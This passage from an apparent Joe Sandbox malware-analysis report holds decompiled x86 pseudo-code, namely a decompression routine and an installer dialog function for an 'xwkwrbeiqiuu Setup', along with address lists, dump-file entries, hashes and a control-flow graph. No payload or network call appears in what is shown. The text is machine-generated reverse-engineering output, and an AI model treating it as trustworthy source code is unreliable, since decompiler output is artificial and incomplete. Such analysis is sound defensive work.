							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                0x00000000
                0x00406083
                0x00406083
                0x00406088
                0x004060ff
                0x00406106
                0x00406110
                0x004066ef
                0x004066ef
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00406765
                0x00406765
                0x0040676b
                0x0040676b
                0x00000000
                0x00406740
                0x00406740
                0x00406744
                0x004068f3
                0x00000000
                0x004068f3
                0x00406750
                0x00406757
                0x0040675f
                0x00406762
                0x00000000
                0x00406762
                0x0040608a
                0x0040608a
                0x0040608e
                0x00406096
                0x00406099
                0x0040609b
                0x0040609e
                0x004060a0
                0x004060a5
                0x004060a8
                0x004060af
                0x004060b6
                0x004060b9
                0x004060c4
                0x004060cc
                0x004060cc
                0x004060c6
                0x004060c6
                0x004060c6
                0x004060bb
                0x004060bb
                0x004060bb
                0x004060d3
                0x004060f1
                0x004060f3
                0x004062c6
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062db
                0x004062de
                0x004062e4
                0x004062fc
                0x004062ff
                0x00406302
                0x00406305
                0x00406305
                0x00406308
                0x0040630e
                0x004062e6
                0x004062e6
                0x004062ee
                0x004062f3
                0x004062f5
                0x004062f7
                0x004062f7
                0x00406318
                0x0040631b
                0x004062be
                0x004062c4
                0x00000000
                0x00000000
                0x00000000
                0x0040631d
                0x00406299
                0x0040629d
                0x004068a5
                0x00000000
                0x004068a5
                0x004062a3
                0x004062a6
                0x004062a9
                0x004062ad
                0x004062b0
                0x004062b6
                0x004062b8
                0x004062b8
                0x004062bb
                0x00000000
                0x004062bb
                0x004060d5
                0x004060d5
                0x004060d8
                0x004060de
                0x004060e0
                0x004060e0
                0x004060e3
                0x004060e6
                0x004060e8
                0x004060e9
                0x004060ec
                0x00406159
                0x00406159
                0x0040615d
                0x00406160
                0x00406163
                0x00406166
                0x00406169
                0x0040616a
                0x0040616d
                0x0040616f
                0x00406175
                0x00406178
                0x0040617b
                0x0040617e
                0x00406181
                0x00406187
                0x004061a3
                0x004061a6
                0x004061a9
                0x004061ac
                0x004061b3
                0x004061b9
                0x004061bd
                0x00406189
                0x00406189
                0x0040618d
                0x00406195
                0x0040619a
                0x0040619c
                0x0040619e
                0x0040619e
                0x004061c7
                0x004061ca
                0x00406141
                0x00406141
                0x00406147
                0x004061fa
                0x00406200
                0x00000000
                0x00000000
                0x00406202
                0x00406205
                0x00406208
                0x0040620b
                0x0040620e
                0x00406211
                0x00406214
                0x00406217
                0x0040621a
                0x00406220
                0x00406238
                0x0040623b
                0x0040623e
                0x00406241
                0x00406241
                0x00406244
                0x0040624a
                0x00406222
                0x00406222
                0x0040622a
                0x0040622f
                0x00406231
                0x00406233
                0x00406233
                0x00406254
                0x00406257
                0x004061d5
                0x004061d9
                0x00406899
                0x00000000
                0x00406899
                0x004061df
                0x004061e2
                0x004061e5
                0x004061e9
                0x004061ec
                0x004061f2
                0x004061f4
                0x004061f4
                0x004061f7
                0x004061f7
                0x00406257
                0x0040625e
                0x0040625e
                0x0040625e
                0x00406262
                0x00406262
                0x00406265
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x0040642e
                0x0040642e
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x00406153
                0x00000000
                0x00000000
                0x00000000
                0x004061d0
                0x0040611c
                0x00406120
                0x0040688d
                0x00406909
                0x00406911
                0x00406918
                0x0040691a
                0x00406921
                0x00406925
                0x00406925
                0x00406126
                0x00406129
                0x0040612c
                0x00406130
                0x00406133
                0x00406139
                0x0040613b
                0x0040613b
                0x0040613e
                0x00000000
                0x0040613e
                0x004061ca
                0x004060d3
                0x00405f07
                0x00405f07
                0x00405f10
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x00405f16
                0x00000000
                0x00405f21
                0x00000000
                0x00000000
                0x00405f2a
                0x00405f2d
                0x00405f30
                0x00405f34
                0x00000000
                0x00000000
                0x00405f3a
                0x00405f3d
                0x00405f3f
                0x00405f40
                0x00405f43
                0x00405f45
                0x00405f46
                0x00405f48
                0x00405f4b
                0x00405f50
                0x00405f55
                0x00405f5e
                0x00405f71
                0x00405f74
                0x00405f80
                0x00405fa8
                0x00405faa
                0x00405fb8
                0x00405fb8
                0x00405fbc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405fac
                0x00405fac
                0x00405faf
                0x00405fb0
                0x00405fb0
                0x00000000
                0x00405fac
                0x00405f86
                0x00405f8b
                0x00405f8b
                0x00405f94
                0x00405f9c
                0x00405f9f
                0x00000000
                0x00405fa5
                0x00405fa5
                0x00000000
                0x00405fa5
                0x00000000
                0x00405fc2
                0x00405fc2
                0x00405fc6
                0x00406872
                0x00000000
                0x00406872
                0x00405fcf
                0x00405fdf
                0x00405fe2
                0x00405fe5
                0x00405fe5
                0x00405fe5
                0x00405fe8
                0x00405fec
                0x00000000
                0x00000000
                0x00405fee
                0x00405ff4
                0x0040601e
                0x00406024
                0x0040602b
                0x00000000
                0x0040602b
                0x00405ffa
                0x00405ffd
                0x00406002
                0x00406002
                0x0040600d
                0x00406015
                0x00406018
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040605d
                0x00406063
                0x00406066
                0x00406073
                0x0040607b
                0x00000000
                0x00000000
                0x00406032
                0x00406032
                0x00406036
                0x00406881
                0x00000000
                0x00406881
                0x00406042
                0x0040604d
                0x0040604d
                0x0040604d
                0x00406050
                0x00406053
                0x00406056
                0x0040605b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406322
                0x00406326
                0x00406344
                0x00406347
                0x0040634e
                0x00406351
                0x00406354
                0x00406357
                0x0040635a
                0x0040635d
                0x0040635f
                0x00406366
                0x00406367
                0x00406369
                0x0040636c
                0x0040636f
                0x00406372
                0x00406372
                0x00406377
                0x00000000
                0x00406377
                0x00406328
                0x0040632b
                0x0040632e
                0x00406338
                0x00000000
                0x00000000
                0x0040638c
                0x00406390
                0x004063b3
                0x004063b6
                0x004063b9
                0x004063c3
                0x00406392
                0x00406392
                0x00406395
                0x00406398
                0x0040639b
                0x004063a8
                0x004063ab
                0x004063ab
                0x00000000
                0x00000000
                0x004063cf
                0x004063d3
                0x00000000
                0x00000000
                0x004063d9
                0x004063dd
                0x00000000
                0x00000000
                0x004063e3
                0x004063e5
                0x004063e9
                0x004063e9
                0x004063ec
                0x004063f0
                0x00000000
                0x00000000
                0x00406440
                0x00406444
                0x0040644b
                0x0040644e
                0x00406451
                0x0040645b
                0x00000000
                0x0040645b
                0x00406446
                0x00000000
                0x00000000
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00406481
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x0040637a
                0x0040637a
                0x0040637d
                0x00000000
                0x00000000
                0x004066b9
                0x004066bd
                0x004066df
                0x004066e2
                0x004066ec
                0x00000000
                0x004066ec
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066c9
                0x004066cc
                0x00000000
                0x00000000
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x00000000
                0x004067ad
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x00000000
                0x0040685f
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x0040680f
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00000000
                0x004066b4
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
                • Instruction ID: eeb6df0b4c754b004cb91f1e651764525fca86d3ed66ed31f7f656e6c0f0dc00
                • Opcode Fuzzy Hash: 4e74e6640404211f02dbcf3e5cdd51f183378cde3108f959ef2b494a3a8ff7bc
                • Instruction Fuzzy Hash: B7F17671D00269CBDF28CFA8C8946ADBBB0FF44305F25816ED856BB281D7385A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403A22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 104 403a22-403a34 105 403b75-403b84 104->105 106 403a3a-403a40 104->106 108 403bd3-403be8 105->108 109 403b86-403bc1 GetDlgItem * 2 call 403ef5 KiUserCallbackDispatcher call 40140b 105->109 106->105 107 403a46-403a4f 106->107 110 403a51-403a5e SetWindowPos 107->110 111 403a64-403a67 107->111 113 403c28-403c2d call 403f41 108->113 114 403bea-403bed 108->114 131 403bc6-403bce 109->131 110->111 115 403a81-403a87 111->115 116 403a69-403a7b ShowWindow 111->116 121 403c32-403c4d 113->121 118 403c20-403c22 114->118 119 403bef-403bfa call 401389 114->119 122 403aa3-403aa6 115->122 123 403a89-403a9e DestroyWindow 115->123 116->115 118->113 126 403ec2 118->126 119->118 141 403bfc-403c1b SendMessageA 119->141 127 403c56-403c5c 121->127 128 403c4f-403c51 call 40140b 121->128 132 403aa8-403ab4 SetWindowLongA 122->132 133 403ab9-403abf 122->133 130 403e9f-403ea5 123->130 129 403ec4-403ecb 126->129 137 403e80-403e99 DestroyWindow EndDialog 127->137 138 403c62-403c6d 127->138 128->127 130->126 135 403ea7-403ead 130->135 131->108 132->129 139 403b62-403b70 call 403f5c 133->139 140 403ac5-403ad6 GetDlgItem 133->140 135->126 142 403eaf-403eb8 ShowWindow 135->142 137->130 138->137 143 403c73-403cc0 call 405b16 call 403ef5 * 3 GetDlgItem 138->143 139->129 144 403af5-403af8 140->144 145 403ad8-403aef SendMessageA IsWindowEnabled 140->145 141->129 142->126 174 403cc2-403cc7 143->174 175 403cca-403d06 ShowWindow EnableWindow call 403f17 EnableWindow 143->175 149 403afa-403afb 144->149 150 403afd-403b00 144->150 145->126 145->144 152 403b2b-403b30 call 403ece 149->152 153 403b02-403b08 150->153 154 403b0e-403b13 150->154 152->139 156 403b49-403b5c SendMessageA 153->156 159 403b0a-403b0c 153->159 155 403b15-403b1b 154->155 154->156 160 403b32-403b3b call 40140b 155->160 161 403b1d-403b23 call 40140b 155->161 156->139 159->152 160->139 171 403b3d-403b47 160->171 170 403b29 161->170 170->152 171->170 174->175 178 403d08-403d09 175->178 179 403d0b 175->179 180 403d0d-403d3b GetSystemMenu EnableMenuItem SendMessageA 178->180 179->180 181 403d50 180->181 182 403d3d-403d4e SendMessageA 180->182 183 403d56-403d8f call 403f2a call 405af4 lstrlenA call 405b16 SetWindowTextA call 401389 181->183 182->183 183->121 192 403d95-403d97 183->192 192->121 193 403d9d-403da1 192->193 194 403dc0-403dd4 DestroyWindow 193->194 195 403da3-403da9 193->195 194->130 197 403dda-403e07 CreateDialogParamA 194->197 195->126 196 403daf-403db5 195->196 196->121 198 403dbb 196->198 197->130 199 403e0d-403e64 call 403ef5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 197->199 198->126 199->126 204 403e66-403e7e ShowWindow call 403f41 199->204 204->130
                C-Code - Quality: 77%
                			E00403A22(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420514 = _t35;
					if(_t115 == 0x110) {
						 *0x423f24 = _t125;
						 *0x420528 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f0 = _t91;
						E00403EF5(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423708); // executed
						 *0x4236ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420514 = 1;
					}
					_t122 =  *0x409238; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F41(0x40b);
						while(1) {
							_t37 =  *0x420514;
							 *0x409238 =  *0x409238 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x409238; // 0x0
							__eflags = _t39 -  *0x423f44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x4236ec - _t133; // 0x7fffffff
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f44; // 0x2
							__eflags =  *0x409238 - _t44; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t130 + 0x24)));
							_t116 =  *(_t130 + 0x14);
							_push(0x42b800);
							E00405B16(_t116, _t125, _t130);
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403EF5(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403EF5(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403EF5(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F17(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f0, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420528);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f0);
							}
							E00403F2A();
							E00405AF4(0x420530, "xwkwrbeiqiuu Setup");
							_push( *((intOrPtr*)(_t130 + 0x18)));
							_push( &(0x420530[lstrlenA(0x420530)]));
							E00405B16(0x420530, _t125, _t130);
							SetWindowTextA(_t125, 0x420530);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)), _t133);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x4236f8);
									 *0x41fd00 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f20,  *_t130 +  *0x423700 & 0x0000ffff, _t125,  *( *(_t130 + 4) * 4 + "=@@"), _t130);
									__eflags = _t73 - _t133;
									 *0x4236f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403EF5(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x4236f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									E00401389( *((intOrPtr*)(_t130 + 0xc)), _t133);
									__eflags =  *0x4236ec - _t133; // 0x7fffffff
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x4236f8, 8);
									E00403F41(0x405);
									goto L58;
								}
